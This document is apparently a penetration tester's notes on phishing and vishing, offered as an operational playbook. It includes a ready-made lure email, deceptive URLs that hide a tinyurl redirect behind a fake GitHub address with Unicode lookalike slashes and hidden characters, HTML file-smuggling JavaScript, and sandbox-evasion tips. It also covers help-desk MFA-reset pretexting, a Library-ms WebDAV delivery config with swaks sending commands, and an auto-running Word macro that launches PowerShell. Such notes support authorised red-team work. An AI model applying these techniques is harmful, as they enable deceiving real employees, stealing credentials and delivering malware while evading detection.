Phishing

Phishing Pages

Spoofing a site

• Can use something like open-lovable to clone and recreate any web app as a React app
  • Since this uses JS, this also has the added benefit of throwing off some phishing detection
• SingleFile is good for downloading pages to spoof
  • Make sure preferences don’t include JavaScript
  • Strip out SingleFile comment (near top) along with anything with an “sf” prefix and links to the original site
• If we get hit with Azure/O365, try using OAuthSeeker

Zendesk

• You can get a domain on Zendesk.com to send emails from
• Zendesk also has IT stuff, so you can make a ticket and assign it to a user
  • This will send them an email with the ticket information, which we can use to have them click a link

Getting users to click a link

• Registering a domain and using mailgun seems to be a good method of controlling contents of an email

Bypassing Spam Filters

• Use Phishious to test an email to see if it would bounce or be caught in spam

Call to Actions

• Using a call to action is a great method of getting a victim to click a link
• This could take the form of an attached document, a big “Acknowledge” button, or something about updating personal information (like Tax info)
  • It can be especially clever to use publicly available resources, such as an available PDF document
  • Modifying a link at the bottom and adding a call to action at the bottom has a great success rate, for example: ```md Dear Team,

Due to operational changes within {company}, we are updating our language to the {document} for {year}. In compliance with regulations on amended documents, we require your acknowledgement of receipt of these changes. To complete your acknowledgement, please navigate to the last page of the attached PDF and click the link provided in the amended article.

Thank you for your continued support in upholding this year’s mission.

Sincerely,

## Spoofing any site in a link

- Often, this isn't actually necessary, as we can just make a pretty email that has a button to click. 

**Techniques**
- Uses `@` character to tell the browser that everything before the `@` is simply authentication for the following page (an encoded tinyurl site) - I didn't find an arbitrary redirect on github
	- You can't use the `@` technique after a domain AND path have been specified, so specify fake paths using a `/` Unicode lookalike: `∕` (effectively making the TLD in the domain very very long)
	- This lookalike character is a unicode division slash without any numbers (think ⅓)
- You can actually URL encode every single character in a link except for the `/`, so the entire tinyurl link is encoded
- `&` can actually be included without encoding in the authentication information (prior to the `@`), so I included bogus URL parameters from an amazon product link to make it look more realistic (hiding the URL encoded link within)
- For google meets, a link starting with a valid URL (e.g. https://github.com) will be underlined, so I included some hidden unicode characters to break the link

**Example**
- `https://` - start of URL
- `U+E0001 U+E0020 U+E007F` - hidden Unicode characters to break link underlining functionality in Google meets
- Used https://embracethered.com/blog/ascii-smuggler.html to encode ` `
- `󠁿github.com` - normal github domain
- `∕praetorian-inc∕Cerebrum∕tree∕main∕Personal%20Spaces∕khael.kugler` - realistic path using fake `∕` character
- `&diff=%75%6E%69%66%69%65%64&uuid=259d9f6c-ea4f-492b-a741-8ca016e53a70&ref=main_1598392` - fake URL parameters used to hide the actual payload
- `@%74%69%6E%79%75%72%6C%2E%63%6F%6D/%33%39%74%7A%72%6A%79%6A` - payload decoding to `tinyurl.com/39tzrjyj`, starting with `@`
- `#&whitespace=ignore&inline=false&workflow=ci-deploy-container-ghcr-ref-main` - more fake parameters, starting with a `#` to not confuse tinyurl's redirection

- When emailing, choose a font that looks good. Menlo is alright, but a bit too code-related

Final payload: `https://󠀁󠀠󠁿github.com∕praetorian-inc∕Cerebrum∕tree∕main∕Personal%20Spaces∕khael.kugler&diff=%75%6E%69%66%69%65%64&uuid=259d9f6c-ea4f-492b-a741-8ca016e53a70&ref=main_1598392@%74%69%6E%79%75%72%6C%2E%63%6F%6D/%33%39%74%7A%72%6A%79%6A#&whitespace=ignore&inline=false&workflow=ci-deploy-container-ghcr-ref-main`

Other example payloads:
`https://github.com∕praetorian-inc∕noseyparker∕releases∕download∕v0.23.0∕secret-noseyparker-v0.23.0-aarch64-apple-darwin.tar.gz&conplccinc=259d9f6c-ea4f-492b-a741-8ca016e53a70ts=abthh8sjiwjcbgqcpkynoq55p8khgag&dasin=B07774L6@%74%69%6E%79%75%72%6C%2E%63%6F%6D/%79%63%38%78%61%66%74%32/&96298722-d186-4e28-b5e9-2ca14f49d977=1`

`https://www.amazon.com∕gp∕product∕B008A0GNA8pr=conplccinc=259d9f6c-ea4f-492b-a741-8ca016e53a70ts=abthh8sjiwjcbgqcpkynoq55p8khgag&dasin=B07774L6TT&plattr=mathplace=priceblockimp@%74%69%6E%79%75%72%6C%2E%63%6F%6D/%79%63%38%78%61%66%74%32?=96298722-d186-4e28-b5e9-2ca14f49d977`

- Can also sort of be used to bypass URL validation
  - Portswigger URL bypass techniques: https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet

## File Downloading Techniques

**File Smuggling - thanks to Print3M**
- Rather than getting a user to download a file from a server, simply store the entire file in JavaScript
- This has two bonuses: the file doesn't need to be fetched from a server, and it also doesn't generate any network logs
- Example:

```js
// File: smuggler.js
function __downloadFile(byteArray, fileName, mimeType) {
    let blob = new Blob([new Uint8Array(byteArray)], { type: mimeType })
    let url = URL.createObjectURL(blob)
    let a = document.createElement("a")
    a.href = url
    a.download = fileName
    document.body.appendChild(a)
    a.click()
    document.body.removeChild(a)
    URL.revokeObjectURL(url)
}
 
// This function is executed from React on "click" event 
function downloadFile() {
    // PUT YOUR BINARY DATA HERE!!!
    const data = [72, 101, 108, 108, 111, 32, 87, 111, 114, 108, 100]
    __downloadFile(data, "file.txt", "text/plain")
}

Sandbox Detection - thanks to Print3M

• Execute JavaScript - most scanners still won’t run JavaScript! Using React actually gives us this OPSEC measure out-of-the-box.
• Timeout - wait a second before smuggling malware. The victim probably won’t click any faster anyway. If the sandbox is waiting for the page to render, a second’s wait is already likely to discourage it.
• OS detection - if the OS doesn’t match with our target, then smuggle a harmless decoy file. This will protect us from burning the operation.
• Screen size - bots often set the incorrect screen size. Using this technique we are also able to detect mobile device users to whom we do not want to serve our malware.
• User Agent - bots often have an unusual User Agent that does not match real browsers.
• Trap buttons - add hidden trap buttons that only the bot clicks. This way we will recognize if a bot is walking around the site.
• Bad HTML practices - using bad HTML practices can naturally obscure the meaning of our code. E.g. using a div element with an onclick action instead of the classic button element can cause the sandbox to not click it.

Abuse Example

• Trick a user to go to a link
• Provide a button that downloads a docx file, directly from Javascript
• Have macros embedded in the blurry file, GG

Vishing

Recon

• Harvest personal/corporate details from linkedin/github
• Identify high-value identifies
• Identify exact help-desk process for a password/MFA reset

IT Helpdesk Techniques

• Asking for a one-time password reset can have great success, especially if information on the impersonate employee can be gained
• This will often be things like ID number, manager name, email, etc.

Windows

• Can’t send malware directly by email, so we need to get them to download the spreadsheet with macros from a link
  • Also need to “blur” the spreadsheet so victim clicks “Enable Editing” to allow macros
  • Avoid Mark of the Web (MOTW) by putting malware inside 7zip, ISO, IMG
• Windows library files are less well-known and can be equally effective for hosting files
• Executing .Library-ms file into executing .lnk file
• These files display remote directories like local directories, where we put .lnk file
  • pip3 install wsgidav for a WebDAV server to host/serve files
  • usage: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root {directory}
• config.Library-ms file contents:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://{kali_IP}</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

• Sending a phishing email with the share:
  • sudo swaks -t {to_email} -t {to_email} --from {from_email} --attach @config.Library-ms --server {mail_server} --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
• Using SMTP with swaks:
  • To use an SMTP server, we need a user whose credentials we know on the domain swaks --server {IP_with_SMTP} --body @{body_txt_file} -ap --from {user@domain} --to {target@domain} --auth-user {user@domain} --auth-password {password} --attach @{file_to_attach} --header "{header_text}"

Misc

Docx Word Macro

• To make a Word macro that runs on document open, the following will work at a basic level:

Sub AutoOpen()

  MyMacro

End Sub
Sub Document_Open()

  MyMacro

End Sub
Sub MyMacro()

  CreateObject("Wscript.Shell").Run "powershell"

End Sub